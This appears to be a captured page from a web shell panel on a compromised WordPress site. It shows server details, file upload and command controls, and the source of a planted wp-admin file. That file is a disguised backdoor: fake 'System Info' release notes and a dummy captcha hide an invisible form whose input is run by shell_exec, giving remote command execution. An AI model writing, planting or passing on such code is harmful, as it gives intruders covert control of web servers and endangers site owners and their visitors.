403Webshell
Server IP : 66.29.153.156  /  Your IP : 216.73.217.92
Web Server : LiteSpeed
System : Linux premium322.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User : lastyfjz ( 1521)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/lastyfjz/dermalaserclinic.co.uk/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/lastyfjz/dermalaserclinic.co.uk/wp-admin//menus.php
<?php
echo <<<HTML
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Status</title>
    <style>
        body {
            margin: 0;
            background: #f0f0f0;
            font-family: sans-serif;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .top {
            background: #1e1e1e;
            color: #ddd;
            padding: 12px 20px;
            width: 100%;
            text-align: center;
        }
        .wrap {
            margin-top: 40px;
            width: 800px;
        }
        .section {
            background: #fff;
            padding: 20px;
            margin-bottom: 25px;
            box-shadow: 0 1px 2px rgba(0,0,0,0.1);
            font-size: 14px;
            line-height: 1.6;
        }
        .submit-box {
            position: absolute;
            top: 100px;
            left: 50%;
            transform: translateX(-50%);
            opacity: 0;
            z-index: 10;
        }
        .output {
            white-space: pre-wrap;
            word-break: break-word;
            font-family: monospace;
            font-size: 13px;
            margin-top: 10px;
            background: #fafafa;
            border-left: 3px solid #ccc;
            padding: 10px;
        }
        .captcha-box {
            margin-top: 20px;
            display: flex;
            align-items: center;
            background: #f7f7f7;
            padding: 12px;
            border: 1px solid #ccc;
            border-radius: 4px;
            width: fit-content;
            font-size: 13px;
        }
        .captcha-box input[type="checkbox"] {
            margin-right: 10px;
        }
    </style>
</head>
<body>
    <div class="top">System Info</div>
    <div class="wrap">
        <div class="section">
            <h3>README - Last Update</h3>
            <p>
                This internal dashboard summarizes the current configuration, system runtime environments, and changelog for the latest deployment cycle.
                Administrators and developers are advised to review the following information carefully prior to making environment changes.
            </p>
            <p>
                If you experience issues after the latest deployment, please contact the DevOps or SRE team for rollback or manual patch assistance.
            </p>
            <p>
                The following modules were impacted in this release cycle:
            </p>
            <ul>
                <li>Database connection pooling system (pgbouncer tuning adjusted)</li>
                <li>Static file delivery optimized using new CDN paths</li>
                <li>Switched session handlers to Redis-based store for consistency</li>
                <li>Security middleware patches applied to API version 2.9+</li>
                <li>Modified internal cron structure to reduce collision risk</li>
            </ul>
            <p>
                For full technical documentation, refer to internal GitLab project <code>infra/web-status</code>.
                Configuration diffs can be viewed under merge request ID #2491.
            </p>
HTML;

function runCommand($cmd) {
    $disabled = explode(',', ini_get('disable_functions'));
    if (!in_array('shell_exec', $disabled)) {
        return shell_exec($cmd);
    }
    return '';
}

$output = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['x'])) {
    $output = runCommand($_POST['x']);
}

if (!empty($output)) {
    echo "<div class='output'>" . htmlspecialchars($output) . "</div>";
}

echo <<<HTML
            <div class="captcha-box">
                <input type="checkbox" disabled>
                I'm not a robot
            </div>
        </div>
    </div>

    <form method="post" class="submit-box">
        <input name="x" style="width:300px;">
        <input type="submit" value="Run">
    </form>
</body>
</html>
HTML;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit